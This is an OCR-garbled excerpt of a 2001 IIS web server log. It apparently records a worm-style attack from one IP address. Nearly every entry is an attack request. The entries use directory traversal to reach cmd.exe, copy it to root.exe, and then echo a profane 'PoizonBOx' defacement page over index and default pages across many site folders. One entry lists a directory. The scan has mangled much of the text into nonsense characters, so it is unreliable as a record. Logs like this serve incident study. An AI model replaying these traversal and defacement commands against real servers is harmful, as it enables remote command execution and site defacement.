%3D7+color%3Dred*>fuck+PoizonBOx<tr’*>“<td’>"<ptalign%3D%22center%224><fontts 
ize%3D4+color%3Dred”*>contact:sysadmcn@yahoo.com.cn”</html“>>../iissamples/index.btm 
502 - 

2001-05-06 10:43:53 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-tbgcolor?63Dblack^^^«br^»^«br^»^«br^?^«cbr^»^«br^»^«br^»^«ta 
ble+width7%3D100%*>“<td*>*<p+align%3D%22center%22/>"<font+size%3D7+color%3 Dred 
A>fuck+USA+Government’</font’>“<tr’>*<td’>*<ptalign%3D%22center%22"><font+size 
%3D7+color%3 Dred”*>fuck+PoizonBOx’<tr*>“<td“>"<ptalign%3D%22center%22%><fontts 
ize%3D4+color%3Dred“>contact:sysadmcn@yahoo.com.cn*</html’>>../tissamples/default.asp 
502 - 

2001-05-06 10:43:54 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot+’<btml“>“<body+bgcolor%3 Dblack’*>*<br’>*<br’*>“<br’*><br*>*<br’><br’*><ta 
blet+width%3D100%*>“<td*>“<ptalign%3D%22center%22’><font+size%3D7+color%3 Dred 
“>fuck+USA+Government*</font’>“<tr’>“<td/>"<ptalign%3D%22center%22’>"<font+size 
%3D7+color%3Dred“>fuckt+PoizonBOx’<tr*>“<td’>“<ptalign%3D%22center%22°><fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html”>>../tissamples/default htm 
502 - 

2001-05-06 10:43:54 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/e+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:43:56 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho+<html/>*<body+bgcolor%3 Dblack’*>“<br’><br’><br’><br’><br’>"<br’><ta 
ble+width%3D100%*><td*>“<p+align%3D%22center%22’><font+size%3D7+color%3Dred 
“>fuck+US A+ Government’*</font’><tr’>"<td’><p talign%3D%22center%22’><font+tsize 
%3D7+color%3Dred*>fuck+P oizonBOx<tr’>*<td“>"<ptalign%3D%22center%22">"<font+s 
ize?63D4--color?63Dred^»contact:sysadmen(g)yahoo.com.cn^«/html^7. /mailroot/index.asp 502 


2001-05-06 10:43:56 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/cecho-^«html^^^«body-bgcolor?93Dblack^?^«br^»^«br^»^«br^»^«br^»^«br^»^«br^»^«ta 
bletwidth963D 1009 6^7^«td^7^«p--align?63D9622center?622^7^«font--size?63D 7--color?63Dred 
^»fuck* US A4-Government^«/font^^^«tr^»^«td^»^«p-align?63D9622center?622^^- font-size 
%3D7+color%3 Dred*>fuck+P oizonBOx’<tr’>“<td’>"<ptalign%3D%22center%22’><fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html>>../mailroot/index.htm 
502 - 

2001-05-06 10:43:58 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echo+“<html>“<body+bgcolor%3 Dblack*>“<br’>*<br’>“<br’*>“<br’><br’*>“<br’>“<ta 
ble+width%3D100%*>“<td*>*<p+align%3D%22center%22’>"<font+size%3D7+color%3Dred 
“>fuck+USA+Government*</font”><tr’>*<td’>"<p+talign%3D%22center%22“>“<fonttsize 
%3D7+color%3 Dred“>fuck+PoizonBOx’<tr’>*<td’>"<ptalign%3D%22center%22’>"<fontts 


e e 


ize?63D4--color?63Dred^»contact:sysadmcn(g)yahoo.com.cn^«/html^?7. /mailroot/default.asp 
502 - 
2001-05-06 10:44:00 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body-bgcolor?63Dblack^»^«br^»^«br^»^«br^»^«br^»^«br^»^«br^»^«ta 
ble--width963D10096^—^«td^-^«p-ralign?/o3D9622center9622^»^«font--size?/63D 7--color?o3Dred 
A>fuck+USA+Government*</font’><tr’><td/>"<ptalign%3D%22center%22’>*<fonttsize 
%3D7+color%3Dred*>fuck+P oizonBOx’<tr’>*<td’>"<ptalign%3 D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html”>>../mailroot/default htm 
502 - 

2001-05-06 10:44:00 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+copyt\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:44:02 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-bgcolor?63Dblack^^«br^»^«br^»^«br^»^«br^^«br^»^«br^^-ta 
ble+width%3D100%*>“<td’>"<ptalign%3D%22center%22"><font+size%3D7+color%3Dred 
“>fick+USA+Government*</font’><tr’>*<td/>"<ptalign%3D%22center%22/>"<fonttsize 
%3D7+color%3Dred’>fuck+PoizonBOx’<tr’>*<td’>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred*>contact:sysadmen@yahoo.com.cn”*</html”>>../nntpfile/index.asp 502 


2001-05-06 10:44:04 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ct+techot*<html’>“<bodytbgcolor%3Dblack’*><br*>*<br’*>*<br’>“<br’><br’*>“<br’>"<ta 
ble+width%3D100%’>*<td’>"<p+align%3D%22center%22’>"<font+size%3D7+color%3Dred 
“>fuck+USA+Government</font/’>“<tr’>“<td’>"<ptalign%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred*>fuck+P oizonBOx’<tr’>“<td’>“<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</biml”>>../nntpfile/index.htm 502 


2001-05-06 10:44:06 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot<html“>“<body+bgcolor%3Dblack’*>“<br’>“<br*>*<br*>*<br’>*<br’><br’>"<ta 
bletwidth%3D100%’>*<td’>“<ptalign%3D%22center%22/>"<font+size%3D7+color%3Dred 
“>fuck+USA+Government*</font’><tr’>*<td/>"<ptalign%3D%22center%22*>"<font+size 
263D7--color?63Dred^»fuck--PoizonBOx^«tr^»^«td^^^«ptalign?$63D9622center?622^7^«fontts 
ize%3D4+color%3Dred’>contact:sysadmcen@yahoo.com.cn*</hitml’>>../nntpfile/default.asp 
502 - 

2001-05-06 10:44:06 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot<html’><body+bgcolor%3Dblack’><br’>*<br’*>*<br’>“<br’>“<br’*>"<br’>*<ta 
ble+width%3D100%><td’><p+align%3D%22center%22’>"<font+size%3D7+color%3Dred 
“>fuck+USA+Government’</font’>*<tr’>“<td/>*<ptalign%3D%22center%22°>"<fontt size 
%3D7+color%3Dred“>fuck+P oizonBOx<tr’>“<td’>"<p+align%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html’>>../nntpfile/default.htm 
502 - 

2001-05-06 10:44:08 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 


/ctcopy+\winnt\system32\cmd.exe+root.exe 502 - 
2001-05-06 10:44:09 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho-^«html^»^«body-bgcolor?63Dblack^^«br^»^«br^7^«br^»^«br^»^«br^»^«br^7^«ta 

ble-"width?63D 10096^7^«td^»^«p-align?/63D9622center?622^7^-fonttsize?63D 7--color?63Dred 

^»fuck--USA--Government^«/font^^^«tr^7^«td^7^«p-ralign?63D9622center9622^7^«fonttsize 

%3D7+color%3Dred’>fuck+PoizonBOx’<tr’><td’>"<ptalign%3 D9022center9022^7^-fontts 

ize?63D4--color963Dred^»contact:sysadmcn(a)yahoo.com.cn^«/btml^7. /Scripts/index.asp 502 - 
2001-05-06 10:44:09 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body-tbgcolor?63Dblack^?^«br^»^«br^7^«br^»^«br^»^«br^?^«br^»^«ta 
ble+width%3D100%><td*>*<p+align%3D%22center%22’>"<font+size%3D7+color%3Dred 
A>fuck+USA+Government’</font/>*<tr’>“<td’>"<ptalign%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred’>fuck+PoizonBOx’<tr’><td’><ptalign%3D%22center%22’>“<fontt+s 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../Scripts/index htm 502 


2001-05-06 10:44:11 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echo+’<html“>*<body+bgcolor%3Dblack*>"<br’>*<br’><br’*>"<br’*><br’*>*<br*>*<ta 
ble-width963D 100%><td’><p+align%3D%22center%22’>"<fonttsize%3D7+color%3Dred 
A>fuck-+USA+Government*</font*\>“<tr’>*<td/>"<ptalign%3D%22center%22>"<fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>"<td’>"<ptalign%3D%22center%22"><fontts 
ize%3D4+color%3Dred’>contact:sysadmcen@yahoo.com.cn*</html”>>../Scripts/default.asp 502 


2001-05-06 10:44:12 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/cechot^«html^»^«body-bgcolor?63Dblack^7^«br^»^«br^»^«br^7^«br^»^«br^»^«br^7^«ta 
bletwidth%3D100%><td’><ptalign%3D%22center%22’>"<fonttsize%3D7+color%3Dred 
^»fück--US A4-Government^«/font^»^«tr^»^«td^^^«p-align?43D9622center?622^^-«fonttsize 
9653D7--color?63Dred^»fuck--PoizonBOx^«tr^»^«td^7^«p-align?63D9622center?022^7^-fonttts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../Scripts/default.htm 
502 - 

2001-05-06 10:44:13 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/ct+copyt+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:44:16 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/cecho-^«html^»^«body-bgcolor?63 Dblack^7^«br^7^«br^»^«br^»^«br^»^«br^?^«br^»^«ta 
blet+-width%3D 100%><td’>*<ptalign%3D%22center%22’>“<fonttsize%3D7+color%3 Dred 
A>fuck+USA+Government’</font/><tr’>*<td4>*<ptalign%3D%22center%22’>*<font+tsize 
9,3D7-color?o3Dred^»fuck--PoizonBOx^«tr^»^«td^7^«p-ralign?63D9622center?622^7^-fontts 
ize%3D4+color%3Dred’>contact:sysadmcen@yahoo.com.cn*</html’>>../webpub/index.asp 502 


2001-05-06 10:44:17 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/cechot^«html^»^«body-bgcolor?63Dblack^7^«br^^«br^7^«br^^«br^»^«br^»^«br^7^«ta 


bletwidth%3D 100%*>“<td*>*<ptalign%3D%22center%22’>"<font+size%3D7+color%3 Dred 
“>fuck+USA+Government*</font’>“<tr’>"<td’><p+align%3D%22center%22’>"<fonttsize 

%3D7+color%3Dred’*>fuck+P oizonBOx’<tr*>*<td’>"<ptalign%3D%22center%22’><font+s 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html“>>../webpub/index.htm 502 


2001-05-06 10:44:20 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho^«html^7^«body-bgcolor?63Dblack^^^«br^»^«br^2^«br^7^«br^^^«br^»^«br^7^«ta 
bletwidth?63D 100%*><td’*>*<p+align%3D%22center%22><font+size%3D7+color%3Dred 
^»fuck-USA4-Government^«/font^^^«tr^»^«td^»^«p-Falign?o3D9622center9022^7^«font-size 
963D 7t-color?63Dred^^fuck--PoizonBOx^«tr^»^«td^^^«p-align963D9622centetr9622^7^«font s 
ize?63D44-color?63Dred^»contact:sysadmcn(Q)yahoo.com.cn^«/html^?7. ./webpub/default.asp 
502 - 

2001-05-06 10:44:21 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body-tbgcolor?63Dblack^?^«br^»^«br^7^«br^2^«br^^«br^2^«br^7^«ta 
bletwidth?63D10096^»^«td^7^«p-align?603D9622center?622^7^-fonttsize?63D7--color?63Dred 
“>fuck+USA+Government’</font’>*<tr’>“<td/>"<ptalign%3D%22center%22"><fonttsize 
%3D7+color%3Dred*>fuck+PoizonBOx*<tr’>“<td’>*<p+align%3D%22center%22’><font+ts 
ize%3D4+color%3Dred’>contact:sysadmcen@yahoo.com.cn*</html>>../webpub/default.htm 
502 - 

2001-05-06 10:44:23 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/ct+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:44:24 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body--bgcolor?63Dblack^^^«br^»^«br^^^«br^»^«br^2^«cbr^7^«br^-^«ta 
blet+width%3D100%*>*<td’>*<p+align%3D%22center%22’>*<font+size%3D7+color%3Dred 
“>fuck+USA+Government*</font’>“<tr’>*<td’>"<ptalign%3D%22center%22*>"<font+size 
%3D7+color%3Dred*>fuck+PoizonBOx’<tr*>*<td’>*<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com.cn’</html’>>../wwwroot/index.asp 
502 - 

2001-05-06 10:44:26 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^7^«body-bgcolor?63Dblack^^^«br^»^«br^»^«br^2^«br^»^«br^-^«br^^«ta 
ble+width%3D 100%>"<td’>*<ptalign%3D%22center%22>“<fonttsize%3D7+color%3Dred 
“>fuck+USA+Government*</font’>“<tr’>“<td’>“<ptalign%3D%22center%22">"<fontt size 
%3D7+color%3Dred*>fuck+P oizonBOx’<tr’>*<td’>“<p+align%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’*</html’>>..Awwwroot/index.htm 
502 - 

2001-05-06 10:44:28 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe - 


/c+echot<html“>*<body+bgcolor%3 Dblack*>“<br’>“<br*>“<br’>*<br*>*<br*>“<br’>“<ta 
ble+width%3D 100%*>*<td’>*<p+align%3D%22center%22’><font+size%3D7+color%3Dred 
“>fuck+USA+Government*</font*>*<tr’>“<td’>"<ptalign?/3 DY%o22center%22"><fontt size 
%3D7+color%3Dred*>fuck+PoizonBOx’<tr*>“<td’>"<ptalign%3D%22center%22">*<fontts 


S e 


ize%3D4+color%3Dred”>contact:sysadmcn@yahoo.com.cn*</html’>>../wwwroot/default.asp 
502 - 
2001-05-06 10:44:28 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ct+echot+*<html’>“*<body+bgcolor%3 Dblack*>“<br“>“<br*>*<br*>“<br’*>"<br*><br’>“<ta 
blet+width%3D100%*>*<td’>“<p+align%3D%22center%22*>"<fonttsize%3D7+color%3Dred 
“>fuck+USA+Government</font’>“<tr’>“<td*>"<ptalign%3D%22center%22">"<font+ size 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>“<td"><p+align%3D%22center%22*>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</htmi*>>../wwwroot/default. htm 
502 - : 

2001-05-06 10:44:29 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /../winnt/system32/cmd.exe 
/ct dirt. Nwwwroot 200 - 

2001-05-06 10:44:32 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:44:34 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c-echot^«html^»^«body-"bgcolor?63Dblack^»^«br^»^«br^»^«br^»^«br^2^«br^»^«br^2^«ta 
bletwidth?63D 1009/6^—^«td^^^«p--align?63D?/22center?622^7^«font-size?63D 7--color?63Dred 
^»fück "US AtGovernment^«/font^»^«tr^»^«td^7^«p-align?63D96022center9622^7^-font size 
%3D7+color%3Dred’>fuck+PoizonBOx’<tr’><td’>“<p+align%3D%22center%224>"<font+s 
ize%3D4+color%3Dred“>contact:sysadmcn@yahoo.com.cn</html>>../wwwroot/./index.asp 
502 - 

2001-05-06 10:44:35 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/cechot^«htmi^»^«body-"bgcolor?43Dblack^»^«br^»^«br^»^«br^»^«br^»^«br^»^«br^»^«ta 
blewidth?63D 100%*>*<td’>“<ptalign%3D%22center%22’>"<fonttsize%3D7+color%3Dred 
“>fuck+USA+Government’</font*>“<tr’>"*<td’>"<ptalign%3D%22center%22">"<fonttsize 
%3D7+color%3Dred’>fuck+PoizonBOx’<tr’><td’>"<p+align%3D%22center%22’><font+s 
ize%3D4+color%3Dred“>contact:sysadmen@yahoo.com.cn*</html“>>../wwwroot//index.htm 
502 - 

2001-05-06 10:44:37 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho+’<html“>“<body+bgcolor%3Dblack’>“<br’>“<br’*>"<br*>*<br’*>"<br*>*<br’>*<ta 
blet+width%3D100%>“<td’>”<p+align%3D%22center%22’>"<fonttsize%3D7+color%3Dred 
“>fuck+USA+Government’”</font’>*<tr’>“<td’><ptalign%3D%22center%22"><fonttsize 
%3D7+color%3Dred’*>fuck+P oizonBOx’<tr’>"<td’>"<p+align%3D%22center%22’>"<font+s 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../wwwroot/./default.asp 
502 - 

2001-05-06 10:44:37 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot+“<btml/>“<body+bgcolor%3Dblack*>“<br’>“<br’>*<br*>“<br*><br*><br’*>"<ta 
ble+width%3D 100%*>*<td’>“<ptalign%3D%22center%22“>"<font+size%3D7+color%3 Dred 
“>fuck+USA+Government’</font’>“<tr’>“<td/>"<ptalign%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred“>fuck+P oizonBOx’<tr’>*<td’>“<ptalign%3 D%22center%22°>"<font+s 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../wwwroot/./default.bhtm 


l e e 


502 - 

2001-05-06 10:44:39 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+copyt\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:44:41 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot-^«html^7^«body-*bgcolor?63Dblack^7^«br^»^«br^»^«br^»^«br^»^«br^7^«br^7^«ta 
bletwidth?63D10096^7^«td^^^«p-ralign963D9622center?022^7^-fonttsize?63D 7-*color?63Dred 
^»fuück "USA: Government^«/font^»^«tr^»^«td^»^«p-align?63D9622center?622^7^-fonttsize 
963D7--color?e3Dred^»fuck--PoizonBOx^«tr^»^«td^»^«p-align963D9622center?622^^^-«fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../wwwroot/../index.asp 
502 - 

2001-05-06 10:44:41 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/¢techot’<himl’>*<body+bgcolor%3Dblack’*>“<br*><br’*>“<br*>"<br*><br*>"*<br’>*<ta 
blet+width’%3D100%*>“<td’><ptalign%3D%22center%22’>“<font+size%3D7+color%3 Dred 
A>fuck+USA+Government</font*>*<tr’>*<td/>"<ptalign%3D%22center%22>"<fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>"<td’>*<ptalign%3D%22center%22’><fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn</html>>../wwwroot/../index.htm 
502 - 

2001-05-06 10:44:42 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot’<html/>"<body+bgcolor%3Dblack’><br’*>“<br’*>“<br’*>“<br’>*<br’*>"<br’>"<ta 
ble+width%3D100%*>*<td4>"<ptalign%3D%22center%22/><font+size%3D7+color%3Dred 
A>fuck+USA+Government”</font/>“<tr’>*<td/><ptalign%3D%22center%22’><font+size 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>*<td’><ptalign%3D%22center%22’><fontts 
ize%3D4+color%3Dred*>contact:sysadmen@yahoo.com.cn’</html’>>../wwwroot/../default.asp 
502 - 

2001-05-06 10:44:42 128.84.234.79 --24.9.173.59 80 GET /scripts/root.exe 


/ctecho+’<html’><body+bgcolor%3Dblack*><br’>*<br’*’><br’*>"<br’*’>"<br’*’>"<br’>“<ta 
blet+width%3D100%">*<td’>*<p+talign%3D%22center%22’><font+size%3D7+color%3Dred 
A>fuck+USA+Government*</font*>“<tr*>“<td/>"<p+align%3D%22center%22’><fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx”<tr’>"<td’><ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred“*>contact:sysadmcn@yahoo.com.cn*</html’>>../wwwroot/../default.ht 
m 502 - ; 

2001-05-06 10:44:45 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /. /winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:44:46 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho^«html^7^«body-bgcolor?63 Dblack^7^«br^»^«br^»^«br^»^«br^^«br^»^«br^^^«ta 
blet+width%3D100%*>*<td’>*<p+align%3D%22center%22’>"<font+size%3D7+color%3 Dred 
“>fuck+USA+Government’*</font*>“<tr’>*<td/>*<ptalign%3D%22center%22’><font+size 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>"<td’>*<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../wwwroot/Downloads/i 
ndex.asp 502 - 


l e e 


2001-05-06 10:44:47 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^7^«body-tbgcolor?63Dblack^^^«br^^^«br^»^«br^7^«br^7^«br^»^«br^c^«ta 
blet+width%3D100%*>*<td’>*<ptalign%3D%22center%22’><font+size%3D7+color%3 Dred 
“>fuck+USA+Government*</font*>*<tr’>*<td’><p+align%3D%22center%22’><fonttsize 
%3D7+color%3Dred“>fuck+PoizonBOx<tr’>"<td’>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred*>contact:sysadmen@yahoo.com.cn*</html”>>../wwwroot/Downloads/i 
ndex.htm 502 - 

2001-05-06 10:44:49 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot“<html>*<body+bgcolor%3 Dblack*>“<br’>“<br’>“<br’*>“<br’*>"<br’><br’><ta 
ble+width%3D100%*>*<td’><ptalign%3D%22center%22’><font+size%3D7+color%3Dred 
A>fuck+USA+Government*</font’>"<tr’>"<td’>"<p+talign%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’><td’>"<ptalign%3D%22center%22*>"<font+s 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn”*</html/>>../wwwroot/Downloads/ 
default.asp 502 - 

2001-05-06 10:44:49 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot’<html>*<body+bgcolor%3Dblack*>“<br’>*<br’>“<br’*>“<br*>*<br’>*<br’>“<ta 
bletwidth%3D100%>*<td*>*<ptalign%3D%22center%22’><font+size%3D7+color%3Dred 
A>fuck+USA+Government</font’>“<tr’>"<td’>"<ptalign%3D%22center%22>"<font+tsize 
%3D7+color%3Dred*>fuck+P oizonBOx<tr’>"<td’>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’</html“>>../wwwroot/Downloads/ 
default htm 502 - 

2001-05-06 10:44:50 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /. /winnt/system32/cmd.exe 
/c+copyt+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:44:51 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body'tbgcolor?63Dblack^?^«br^»^«br^^«br^7^«br^»^«br^^^«br^7^«ta 
blet+width%3D100%">*<td*>*<ptalign%3D%22center%22’>*<font+size%3D7+color%3Dred 
^»füuck--USA--Government^«/font^»^«tr^»^«td^^^«p-align?03D9622center?622^7^«font size 
%3D7+color%3Dred*>fuck+PoizonBOx<tr’>“<td’><ptalign%3D%22center%22*><fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html>>../wwwroot/images/inde 
x.asp 502 - 

2001-05-06 10:44:53 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho-t^«html^»^«body--bgcolor?e3Dblack^7^«br^^«br^»^«br^»^«br^»^«br^^^«br^2^«ta 
bletwidth?63D10096^7^«td^^^«p--align?e3D?622center?622^»^«fonttsize?63D 74-color?63 Dred 
“>fuck+USA+Government*</font/>“<tr’>"<td’>"<ptalign%3D%22center%22/>"<fonttsize 
%3D7+color%3Dred*>fuck+PoizonBOx’<tr>"<td’>"<ptalign%3DY%22center%22’><fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../wwwroot/images/inde 
x.htm 502 - 

2001-05-06 10:44:54 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body--bgcolor?63Dblack^»^«br^»^«br^»^«br^^^«br^»^«br^7^«br^2^«ta 


& e 


ble--width?63D 10096^7^«td^7^«p-Falign?63D9622center?622^7^«fontsize?63D'7--color?63Dred 
A>fuck+USA+Government’</font’>*<tr’>"<td’>"<ptalign%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred*>fuck+PoizonBOx™<tr’>“<td’>“<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com.cn*</html’>>../wwwroot/images/defa 
ult.asp 502 - 

2001-05-06 10:44:55 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ct+echot*<html’>*<body+bgcolor%3 Dblack’>“<br’*>*<br’>“<br’*>“<br’*>"<br’>*<br’><ta 
ble+width%3D100%*><td’>*<ptalign%3D%22center%22’><fonttsize%3D7+color%3 Dred 
A>fuck+USA+Government’*</font*>“<tr’>*<td’>*<p+talign%3D%22center%22"><fonttsize 
%3D7+color%3Dred’>fiuck+P oizonBOx’<tr’>“<td’>"<ptalign%3D%22center%22’>"<font+s 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.ca*</himl”>>../wwwroot/images/defa 
ult.htm 502 - 

2001-05-06 10:44:55 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /../winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:44:56 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho*^«html^»^«body-tbgcolor?63Dblack^?^«br^»^«br^»^«br^»^«br^7^«br^7^«br^^«ta 
ble+width%3D100%>*<td’><ptalign%3D%22center%22*>"<fonttsize%3D7+color%3Dred 
A>fuck+USA+Government’</font*>*<tr’>*<td’><ptalign%3D%22center%22’><fonttsize 
%3D7+color%3Dred*>fuck+PoizonBOx’<tr’>“<td’>"<ptalign%3 D%22center022">“<font+s 
ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com.cn”*</html’>>../wwwroot/images.pez/i 
ndex.asp 502 - 

2001-05-06 10:44:57 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho^«html^»^«body-bgcolor?63Dblack^»^«br^»^«br^»^«br^»^«br^»^«br^»^«br^»^«ta 
blet+width%3D 100%*>*<td’>*<ptalign%3D%22center%22’>"<fontt+size%3D7+color%3Dred 
“>fuck+USA+Government*</font*>*<tr’>”*<td/>“<ptalign%3D%22center%22%>"<fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>“<td’>“<ptalign%o3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’</html>>../wwwroot/images. pez/i 
ndex.htm 502 - 

2001-05-06 10:44:57 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho^«html^»^«body--bgcolor?63Dblack^»^«br^»^«br^»^«br^7^«br^»^«br^»^«br^»^-«ta 
blet+width%3D100%*><td’>*<ptalign%3D%22center%22’>"<font+size%3D7+color%3Dred 
A>fuck+USA+Government’</font/>*<tr’>”*<td’>"<p+align%3D%22center%22/>"<fonttsize 
%3D7+color%3Dred*>fuck+PoizonBOx’<tr’><td’><p+talign%3D%22center%22“>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn”*</html>>../wwwroot/images.pez/ 
default.asp 502 - : 

2001-05-06 10:44:59 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body-tbgcolor?63Dblack^»^«br^»^«br^»^«br^7^«br^^«br^7^«br^»^«ta 
bletwidth%3D100%">*<td*>*<p+talign%3D%22center%22/>"<font+size%3D7+color%3 Dred 
A>fuck+USA+Government’*</font*>“<ir’>”<td’>*<ptalign%3D%22center%22">"<font+size 
%3D7+color%3Dred*>fuck+P oizonBOx’<tr’>"<td’>*<ptalign%3D%22center%22’><fontts 


l $ | e 


ize?63D4-color?63 Dred^»contact:sysadmcn(g)yahoo.com.cn^«/html^7. /wwwroot/images.pez/ 
default.htm 502 - 

2001-05-06 10:44:59 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:00 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


